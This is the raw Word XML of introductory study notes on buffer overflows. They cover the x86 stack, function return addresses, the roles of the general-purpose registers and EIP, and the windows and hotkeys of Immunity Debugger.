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54F6B" w14:textId="77777777" w:rsidR="00C9512F" w:rsidRDefault="00B015A4" w:rsidP="00B015A4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B015A4">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>BUFFER OVERFLOW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172C47B0" w14:textId="40EED55D" w:rsidR="003B3EE2" w:rsidRPr="003B3EE2" w:rsidRDefault="003B3EE2" w:rsidP="003B3EE2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3EE2">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Introduction to the x86 Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F82E83" w14:textId="629CB7E7" w:rsidR="003B3EE2" w:rsidRDefault="003B3EE2" w:rsidP="003B3EE2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6570"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3EE2">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="003B3EE2">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>PROGRAM MEMEORY:</w:t>
      </w:r>
      <w:r w:rsidRPr="003B3EE2">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003B3EE2">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7509DD28" wp14:editId="7197AB8A">
            <wp:extent cx="2189189" cy="1701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723" cy="170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  <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="314812FA" w14:textId="76984F45" w:rsidR="003B3EE2" w:rsidRPr="003B3EE2" w:rsidRDefault="003B3EE2" w:rsidP="003B3EE2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6570"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3EE2">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>For buffer overflow we will mainly concentrate on the stack part of it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DFB7A3" w14:textId="20654A1A" w:rsidR="0093217C" w:rsidRDefault="003B3EE2" w:rsidP="003B3EE2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3EE2">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">         When a thread is running, it executes code from within the Progra</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>m Image or from various Dynamic Link Libraries (DLLs).</w:t>
      </w:r>
      <w:r w:rsidRPr="003B3EE2">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">The thread requires a short-term data area </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">for functions, local </w:t>
      </w:r>
      <w:r w:rsidR="00937C12">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">variables, </w:t>
      </w:r>
      <w:r w:rsidRPr="003B3EE2">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>and program control information, which is known as the stac</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidR="0093217C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00937C12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To facilitate independent</w:t>
      </w:r>
      <w:r w:rsidR="00937C12">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003B3EE2">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>execution of multiple threads, each thread in a running application has its own stack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49962C27" w14:textId="1DCDBBAA" w:rsidR="0093217C" w:rsidRDefault="00937C12" w:rsidP="003B3EE2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It follows the technique of last</w:t>
      </w:r>
      <w:r w:rsidR="0093217C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> in first out</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0093217C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>(LIFO)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9C7533" w14:textId="13A268DF" w:rsidR="00573CF1" w:rsidRDefault="00573CF1" w:rsidP="009265D1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00573CF1">
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Function Return Mechanics</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00573CF1">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>hen a function is called it must know the return address</w:t>
      </w:r>
      <w:r w:rsidR="009265D1">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009265D1" w:rsidRPr="009265D1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009265D1">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">When a function ends, the </w:t>
      </w:r>
      <w:r w:rsidR="009265D1" w:rsidRPr="009265D1">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>return address is taken from the stack an</w:t>
      </w:r>
      <w:r w:rsidR="009265D1">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">d used to restore the execution </w:t>
      </w:r>
      <w:r w:rsidR="009265D1" w:rsidRPr="009265D1">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>flow back to the main program or the calling function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589DF83F" w14:textId="1F45DE83" w:rsidR="009265D1" w:rsidRDefault="009265D1" w:rsidP="009265D1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">EG:- </w:t>
      </w:r>
      <w:r w:rsidRPr="009265D1">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D540FA4" wp14:editId="79FCA25B">
            <wp:extent cx="5325110" cy="113551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990" cy="116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B2B9" w14:textId="571DFCCE" w:rsidR="00970A0B" w:rsidRDefault="00937C12" w:rsidP="009265D1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00970A0B">
        <w:rPr>
          <w:rFonts w:ascii="Roboto-Light" w:hAnsi="Roboto-Light" w:cs="Roboto-Light"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidR="00970A0B" w:rsidRPr="00970A0B">
        <w:rPr>
          <w:rFonts w:ascii="Roboto-Light" w:hAnsi="Roboto-Light" w:cs="Roboto-Light"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> stack is used for storage of data, pointers, and arguments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B53F33" w14:textId="4606F025" w:rsidR="00B03227" w:rsidRPr="00F72100" w:rsidRDefault="00F72100" w:rsidP="009265D1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72100">
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>CPU REGISTER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B55E06E" w14:textId="5D5A583D" w:rsidR="009D7850" w:rsidRDefault="00F72100" w:rsidP="00B015A4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72100">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">hey are </w:t>
      </w:r>
      <w:r w:rsidR="009D7850">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>small extremely high speed cpu</w:t>
      </w:r>
      <w:r w:rsidR="00937C12">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="009D7850">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> .To perform efficient code execution the cpu maintains series of 9 32-bit register.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4746700F" w14:textId="77777777" w:rsidR="00970A0B" w:rsidRPr="00AD1606" w:rsidRDefault="009D7850" w:rsidP="00AD1606">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD1606">
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>EAX:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1606">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00970A0B" w:rsidRPr="00AD1606">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>arithmetic operation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A22B393" w14:textId="77777777" w:rsidR="00970A0B" w:rsidRPr="00AD1606" w:rsidRDefault="00970A0B" w:rsidP="00AD1606">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD1606">
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>EBX:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1606">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Base pointer for memory address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4109F415" w14:textId="77777777" w:rsidR="00970A0B" w:rsidRPr="00AD1606" w:rsidRDefault="00970A0B" w:rsidP="00AD1606">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD1606">
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>ECX:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1606">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">  counter for loops</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF73E4C" w14:textId="77777777" w:rsidR="00970A0B" w:rsidRPr="00AD1606" w:rsidRDefault="00970A0B" w:rsidP="00AD1606">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD1606">
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>EDX:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1606">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> I/O port addressing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E03B77" w14:textId="77777777" w:rsidR="00970A0B" w:rsidRPr="00AD1606" w:rsidRDefault="00970A0B" w:rsidP="00AD1606">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD1606">
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>ESI:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1606">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> pointer addressing the source during copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B2FC21" w14:textId="77777777" w:rsidR="00970A0B" w:rsidRPr="00AD1606" w:rsidRDefault="00970A0B" w:rsidP="00AD1606">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD1606">
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>EDI:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1606">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> pointer addressing the destination during the copy</w:t>
      </w:r>
      <w:r w:rsidR="003B3EE2" w:rsidRPr="00AD1606">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565E3E05" w14:textId="5A51CCCE" w:rsidR="00970A0B" w:rsidRPr="00AD1606" w:rsidRDefault="00970A0B" w:rsidP="00AD1606">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD1606">
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>ESP:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1606">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00243FC0" w:rsidRPr="00AD1606">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Stack is dynamic and changes constantly duri</w:t>
      </w:r>
      <w:r w:rsidR="00C74149">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>ng program execution</w:t>
      </w:r>
      <w:r w:rsidR="00243FC0" w:rsidRPr="00AD1606">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00243FC0" w:rsidRPr="00243FC0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00243FC0" w:rsidRPr="00AD1606">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>ESP, the stack pointer, keeps</w:t>
      </w:r>
      <w:r w:rsidR="00C74149">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00243FC0" w:rsidRPr="00AD1606">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>“track” of the most recently referenced location on the stack (top of the stack) by storing a pointer to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2ED810" w14:textId="58EF6F97" w:rsidR="00970A0B" w:rsidRPr="00AD1606" w:rsidRDefault="00970A0B" w:rsidP="00AD1606">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD1606">
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>EBP:</w:t>
      </w:r>
      <w:r w:rsidR="00243FC0" w:rsidRPr="00243FC0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00243FC0" w:rsidRPr="00AD1606">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>EBP, the base pointer, solves this by storing a pointer to the top of the stack when a function is called. By accessing EBP, a function can easily reference information from its own stack frame (via offsets) while executing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10923F25" w14:textId="0115776A" w:rsidR="00817E79" w:rsidRDefault="00970A0B" w:rsidP="00817E79">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD1606">
        <w:rPr>
          <w:b/>
          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>EIP:</w:t>
      </w:r>
      <w:r w:rsidR="003B3EE2" w:rsidRPr="00AD1606">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="00FE5CBD" w:rsidRPr="00AD1606">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00243FC0" w:rsidRPr="00AD1606">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">It is the instruction pointer  </w:t>
      </w:r>
      <w:r w:rsidR="00AD1606" w:rsidRPr="00AD1606">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> as it points to the next code to</w:t>
      </w:r>
      <w:r w:rsidR="00C74149">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> be executed. </w:t>
      </w:r>
      <w:r w:rsidR="00AD1606" w:rsidRPr="00AD1606">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> It is the main target as a pentester.</w:t>
      </w:r>
      <w:r w:rsidR="00817E79" w:rsidRPr="00817E79">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5C14BB" w14:textId="77777777" w:rsidR="00817E79" w:rsidRDefault="00817E79" w:rsidP="00817E79">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="643B1B1C" w14:textId="77777777" w:rsidR="00817E79" w:rsidRDefault="00817E79" w:rsidP="00817E79">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817E79">
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>TOOL USED:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817E79">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> immunity debugger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7108F9E0" w14:textId="65367FA6" w:rsidR="006C08BD" w:rsidRDefault="006C08BD" w:rsidP="00817E79">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>It has four windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50588E38" w14:textId="4E26976B" w:rsidR="006C08BD" w:rsidRPr="00C74149" w:rsidRDefault="006C08BD" w:rsidP="00C74149">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C74149">
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Upper left:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C74149">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> assembly instruction (highlighted in blue the next instruction to be executed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398BBB77" w14:textId="6EC4674D" w:rsidR="006C08BD" w:rsidRPr="00C74149" w:rsidRDefault="006C08BD" w:rsidP="00C74149">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C74149">
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Upper right:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C74149">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> contains the value of all registers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA52D37" w14:textId="2A987553" w:rsidR="006C08BD" w:rsidRPr="00C74149" w:rsidRDefault="006C08BD" w:rsidP="00C74149">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C74149">
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Lower right:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C74149">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Shows the st</w:t>
      </w:r>
      <w:r w:rsidR="00C74149">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>ack contents</w:t>
      </w:r>
      <w:r w:rsidRPr="00C74149">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>.   ( address,  hex data, aascii  representation of data, comments)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CBDDBD" w14:textId="094C0565" w:rsidR="006C08BD" w:rsidRDefault="006C08BD" w:rsidP="00C74149">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C74149">
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Lower left:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C74149">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> show the content at any memory  (right click for more formats)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C63327" w14:textId="07EC1DAD" w:rsidR="00C74149" w:rsidRDefault="00C74149" w:rsidP="00C74149">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>F7: step into (one at a time)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083B3D42" w14:textId="5165BECA" w:rsidR="00C74149" w:rsidRDefault="00C74149" w:rsidP="00C74149">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>F8: step over</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBBC9AB" w14:textId="77777777" w:rsidR="00B92BFE" w:rsidRDefault="00937C12" w:rsidP="00C74149">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>F2: break point</w:t>
      </w:r>
    </w:p>
